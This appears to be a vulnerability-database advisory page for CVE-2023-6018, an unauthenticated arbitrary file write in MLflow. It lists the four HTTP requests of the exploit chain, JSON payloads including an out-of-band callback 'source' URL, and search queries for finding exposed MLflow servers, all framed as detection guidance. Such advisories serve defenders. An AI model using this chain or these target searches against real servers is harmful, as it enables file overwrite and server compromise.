cbcvebase.
CVE-2023-6018
published 2023-11-16

CVE-2023-6018: An attacker can overwrite any file on the server hosting MLflow without any authentication.

PriorityP180critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
47.87%
98.7th percentile
An attacker can overwrite any file on the server hosting MLflow without any authentication.

Affected

2 ranges
VendorProductVersion rangeFixed in
mlflowmlflow_mlflow>= 0 < 2.9.22.9.2
mlflowmlflow_mlflowunspecified – latest

Detection & IOCsextracted from sources · hover to see the quote

url/ajax-api/2.0/mlflow/registered-models/create
url/ajax-api/2.0/mlflow/model-versions/create
url/model-versions/get-artifact?path=random&name={{model_name}}&version=2
command{"name": "{{model_name}}", "source": "http://{{interactsh-url}}/api/2.0/mlflow-artifacts/artifacts/"}
command{"name": "{{model_name}}", "source": "models:/{{model_name}}/1"}
  • Monitor for unauthenticated POST requests to /ajax-api/2.0/mlflow/registered-models/create and /ajax-api/2.0/mlflow/model-versions/create — these are the first two steps of the exploit chain.
  • Detect model-version creation requests where the 'source' field contains an external HTTP URL (SSRF/arbitrary-write pivot), particularly pointing to /api/2.0/mlflow-artifacts/artifacts/.
  • Detect model-version creation requests where the 'source' field uses the models:/ URI scheme referencing a previously created model, which is the second-stage of the exploit chain enabling arbitrary file write.
  • Monitor GET requests to /model-versions/get-artifact with arbitrary path parameters — this endpoint is used to trigger the file write in the final exploit step.
  • Use Shodan/FOFA to identify exposed MLflow instances as potential targets: Shodan query http.title:"mlflow", FOFA queries title="mlflow" or app="mlflow", Google dork intitle:"mlflow".
  • Confirm exploitation by checking for an outbound HTTP interaction (OOB callback) triggered during model-version creation with an external source URL — a successful callback indicates the server fetched the attacker-controlled URL.
  • Validate MLflow API responses for the presence of 'registered_model' and 'name' fields in the body to confirm a live, exploitable MLflow instance.
  • ·The exploit requires a sequence of exactly 4 HTTP requests (max-request: 4): create a registered model, create a model version with an external HTTP source, create a second model version with a models:/ source referencing the first, then trigger artifact retrieval. All steps must succeed for arbitrary file write.
  • ·No authentication is required for any of the four exploit steps — the vulnerability is exploitable by completely unauthenticated attackers.
  • ·The exploit is classified as intrusive (tag: intrusive) — running detection probes will actively create registered models and model versions on the target MLflow instance.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv3.010.0CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.